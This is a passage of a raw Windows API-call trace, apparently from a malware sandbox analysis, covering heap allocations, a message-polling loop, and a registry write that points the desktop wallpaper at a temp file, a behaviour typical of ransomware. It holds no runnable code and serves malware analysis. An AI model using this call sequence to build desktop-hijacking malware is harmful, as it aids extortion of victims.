lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0270.572] timeGetTime () returned 0x1183d90 [0270.572] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.572] Sleep (dwMilliseconds=0xa) [0270.587] timeGetTime () returned 0x1183d9f [0270.587] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.587] Sleep (dwMilliseconds=0xa) [0270.598] timeGetTime () returned 0x1183dab [0270.598] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.598] Sleep (dwMilliseconds=0xa) [0270.616] timeGetTime () returned 0x1183dbe [0270.616] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.617] Sleep (dwMilliseconds=0xa) [0270.632] timeGetTime () returned 0x1183dcd [0270.632] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.632] Sleep (dwMilliseconds=0xa) [0270.670] timeGetTime () returned 0x1183df4 [0270.670] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.670] Sleep (dwMilliseconds=0xa) [0270.683] timeGetTime () returned 0x1183dff [0270.683] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.683] Sleep (dwMilliseconds=0xa) [0270.696] timeGetTime () returned 0x1183e0d [0270.696] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.696] Sleep (dwMilliseconds=0xa) [0270.715] timeGetTime () returned 0x1183e21 [0270.715] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.715] Sleep (dwMilliseconds=0xa) [0270.758] timeGetTime () returned 0x1183e4b [0270.758] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.758] Sleep (dwMilliseconds=0xa) [0270.771] timeGetTime () returned 0x1183e57 [0270.771] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.771] Sleep (dwMilliseconds=0xa) [0270.786] timeGetTime () returned 0x1183e67 [0270.786] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.786] Sleep (dwMilliseconds=0xa) [0270.804] timeGetTime () returned 0x1183e78 [0270.804] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.804] Sleep (dwMilliseconds=0xa) [0270.818] timeGetTime () returned 0x1183e87 [0270.818] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.818] Sleep (dwMilliseconds=0xa) [0270.862] timeGetTime () returned 0x1183eb3 [0270.862] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.862] Sleep (dwMilliseconds=0xa) [0270.882] timeGetTime () returned 0x1183ec7 [0270.883] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.883] Sleep (dwMilliseconds=0xa) [0270.897] timeGetTime () returned 0x1183ed5 [0270.897] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.897] Sleep (dwMilliseconds=0xa) [0270.916] timeGetTime () returned 0x1183eea [0270.916] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.916] Sleep (dwMilliseconds=0xa) [0270.931] timeGetTime () returned 0x1183ef7 [0270.931] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.931] Sleep (dwMilliseconds=0xa) [0270.945] timeGetTime () returned 0x1183f06 [0270.945] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.945] Sleep (dwMilliseconds=0xa) [0270.969] timeGetTime () returned 0x1183f1f [0270.970] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.970] Sleep (dwMilliseconds=0xa) [0270.998] timeGetTime () returned 0x1183f3b [0270.998] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.998] Sleep (dwMilliseconds=0xa) [0271.029] timeGetTime () returned 0x1183f59 [0271.029] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.029] Sleep (dwMilliseconds=0xa) [0271.114] timeGetTime () returned 0x1183faf [0271.114] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.114] Sleep (dwMilliseconds=0xa) [0271.158] timeGetTime () returned 0x1183fdb [0271.158] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.158] Sleep (dwMilliseconds=0xa) [0271.206] timeGetTime () returned 0x118400b [0271.206] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.206] Sleep (dwMilliseconds=0xa) [0271.258] timeGetTime () returned 0x1184040 [0271.258] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.258] Sleep (dwMilliseconds=0xa) [0271.301] timeGetTime () returned 0x1184069 [0271.301] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.301] Sleep (dwMilliseconds=0xa) [0271.340] timeGetTime () returned 0x1184091 [0271.340] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0271.340] TranslateMessage (lpMsg=0x8cf798) returned 0 [0271.340] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0271.340] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0271.340] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0271.341] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.341] Sleep (dwMilliseconds=0xa) [0271.441] timeGetTime () returned 0x11840f7 [0271.442] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.442] Sleep (dwMilliseconds=0xa) [0271.487] timeGetTime () returned 0x1184123 [0271.487] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.487] Sleep (dwMilliseconds=0xa) [0271.523] timeGetTime () returned 0x1184148 [0271.524] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.524] Sleep (dwMilliseconds=0xa) [0271.570] timeGetTime () returned 0x1184178 [0271.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0271.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0271.570] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0271.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0271.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0271.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0271.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0271.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0271.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0271.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0271.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0271.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0271.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0271.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0271.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0271.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0271.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0271.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0271.571] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0271.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0271.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0271.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0271.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0271.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0271.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0271.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0271.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0271.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0271.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0271.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0271.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0271.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0271.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0271.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0271.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0271.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0271.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0271.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0271.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0271.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0271.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0271.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0271.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0271.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0271.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0271.573] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0271.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0271.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0271.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0271.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0271.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0271.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0271.573] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0271.573] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0271.573] RegCloseKey (hKey=0x2d0) returned 0x0 [0271.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0271.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0271.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0271.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0271.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0271.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0271.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0271.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0271.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0271.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0271.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0271.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0271.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0271.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0271.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0271.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0271.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0271.574] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0271.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0271.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0271.574] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0271.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0271.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0271.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0271.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51910 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0271.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0271.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0271.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0271.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0271.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0271.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0271.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0271.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0271.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0271.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0271.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0271.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0271.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0271.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0271.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0271.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0271.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0271.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0271.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0271.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0271.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0271.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0271.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0271.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0271.577] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0271.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0271.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0271.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0271.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0271.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0271.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0271.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0271.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0271.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0271.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0271.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0271.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0271.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0271.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0271.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0271.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0271.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0271.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0271.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0271.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0271.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0271.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0271.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0271.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0271.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0271.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0271.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0271.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0271.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0271.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0271.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0271.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0271.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0271.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0271.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0271.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0271.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0271.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0271.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0271.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0271.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: 